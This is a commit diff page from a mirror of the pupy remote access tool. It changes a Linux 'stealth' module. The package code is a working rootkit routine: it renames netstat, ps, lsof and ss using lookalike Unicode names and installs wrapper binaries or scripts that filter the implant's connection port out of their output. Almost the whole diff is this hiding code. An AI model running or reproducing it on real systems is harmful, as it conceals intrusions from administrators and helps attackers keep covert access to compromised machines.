Rooba
/
pupy
mirror of https://github.com/n1nj4sec/pupy.git
1
1
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'RedSunEmpire-master' into dev

This commit is contained in:
n1nj4sec 2016-05-03 18:13:10 +02:00
parent a405d15ec0 746b58c220
commit 5d72cfaac5
2 changed files with 54 additions and 48 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

30
pupy/modules/linux_stealth.py
View File

@ -1,31 +1,23 @@
#!/usr/bin/env python #!/usr/bin/env python
from pupylib.PupyModule import * from pupylib.PupyModule import *
from pupylib.utils.rpyc_utils import redirected_stdio
__class_name__="SetStealth" __class_name__="SetStealth"
def print_callback(data):
sys.stdout.write(data)
sys.stdout.flush()
@config(cat="manage", compat="unix") @config(compat="linux", cat="manage")
class SetStealth(PupyModule): class SetStealth(PupyModule):
"""Hides the runnin process from netstat, ss, ps, lsof by using modified binaries. Be careful when choosing the port. """Hides the runnin process from netstat, ss, ps, lsof by using modified binaries.
Credits to: http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/ Credits to: http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/
Demo: https://vimeo.com/157356150"""
********************** /!\ WARNING /!\ ********************** dependencies=["linux_stealth"]
* Do NOT run the stealh module more than ONCE on a machine. *
* Running it two times will brake the binaries. *
*************************************************************
NOTE: The pp.py script needs to be running with root privileges in order to run this module."""
def init_argparse(self): def init_argparse(self):
self.arg_parser = PupyArgumentParser(prog="Linux Stealth Module", description=self.__doc__) self.arg_parser = PupyArgumentParser(prog="Linux Stealth Module", description=self.__doc__)
self.arg_parser.add_argument('port', type=int, help='The port number to which Pupy is connecting to.') self.arg_parser.add_argument('--port', default=None, help='The port number to which Pupy is connecting to.')
def is_compatible(self):
a,r=super(SetStealth, self).is_compatible()
if not a:
return False, r
if self.client.conn.modules['subprocess'].check_output(r"ls -l `dirname \`which netstat\``/net*tat | wc -l", shell=True).strip() == "2":
return False, "It looks like this module has already been run on this machine."
return True, ""
def run(self, args): def run(self, args):
self.client.load_package("linux_stealth") with redirected_stdio(self.client.conn):
self.client.conn.modules['linux_stealth'].run(str(args.port)) self.client.conn.modules['linux_stealth'].run(args.port)
self.success("Module executed successfully.") self.success("Module executed successfully.")

72
pupy/packages/linux/all/linux_stealth.py
View File

@ -1,36 +1,50 @@
#!/usr/bin/env python #!/usr/bin/env python
import os import sys
import subprocess import subprocess
import os
import time import time
def cmd_exists(cmd):
return subprocess.call("type " + cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
def run(port): def run(port=None):
if cmd_exists("gcc") == True: if port is None:
bash=r"""which netstat ps lsof|perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,"|gcc -xc - -o$o";print F qq{int main(int a,char**b){char*c[999999]={"sh","-c","$_ \$*|grep -vE \\"""+'"'+port+"""|\$\$|[$s-$n]|grep\\\\""};memcpy(c+3,b,8*a);execv("/bin/sh",c);}}'""" try:
#subprocess.call(bash, shell=True) import pupy
with open('/tmp/b', 'w') as f: host, port=pupy.get_connect_back_host().split(":")
f.write(bash) except:
os.system("bash /tmp/b") raise Exception("pupy connect back port couldn't be found, please precise it manually")
time.sleep(3)
os.remove("/tmp/b") print "hidding port %s ..."%port
else:
bash=r"""which netstat ps lsof |perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,">$o";print F"#!/bin/sh\n$_ \$*|grep -vE \"[$s-$n]|grep|"""+port+"""\\\\"";chmod 493,$o'""" a=subprocess.check_output(["netstat", "-tn"])
with open("/tmp/p", "w") as f: if port in a:
f.write(bash) def cmd_exists(cmd):
os.system("bash /tmp/p") return subprocess.call("type " + cmd, shell=True,
time.sleep(3) stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
os.remove("/tmp/p") if cmd_exists("gcc") == True:
bashss="""#!/bin/bash bash=r"""which netstat ps lsof|perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,"|gcc -xc - -o$o";print F qq{int main(int a,char**b){char*c[999999]={"sh","-c","$_ \$*|grep -vE \\"""+'"'+port+"""|\$\$|[$s-$n]|grep\\\\""};memcpy(c+3,b,8*a);execv("/bin/sh",c);}}'"""
with open('/tmp/b', 'w') as f:
f.write(bash)
f.close()
os.system("bash /tmp/b")
time.sleep(3)
os.remove("/tmp/b")
else:
bash=r"""which netstat ps lsof |perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,">$o";print F"#!/bin/sh\n$_ \$*|grep -vE \"[$s-$n]|grep|"""+port+"""\\\\"";chmod 493,$o'"""
with open("/tmp/p", "w") as f:
f.write(bash)
f.close()
os.system("bash /tmp/p")
time.sleep(3)
os.remove("/tmp/p")
bashss="""#!/bin/bash
/bin/zss $* | grep -v """+port /bin/zss $* | grep -v """+port
get_ss_path=subprocess.check_output('which ss', shell=True) get_ss_path=subprocess.check_output('which ss', shell=True)
path=get_ss_path[:-3] path=get_ss_path[:-3]
os.system("mv "+path+"ss "+path+"zss") os.system("mv "+path+"ss "+path+"zss")
with open(path+"ss", "w") as newss: with open(path+"ss", "w") as newss:
newss.write(bashss) newss.write(bashss)
os.system("chmod +x "+path+"ss") newss.close()
#blazo - fresh orange os.system("chmod +x "+path+"ss")
#brock - september 22nd else:
#Creds to: www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/ print "port is already hidden"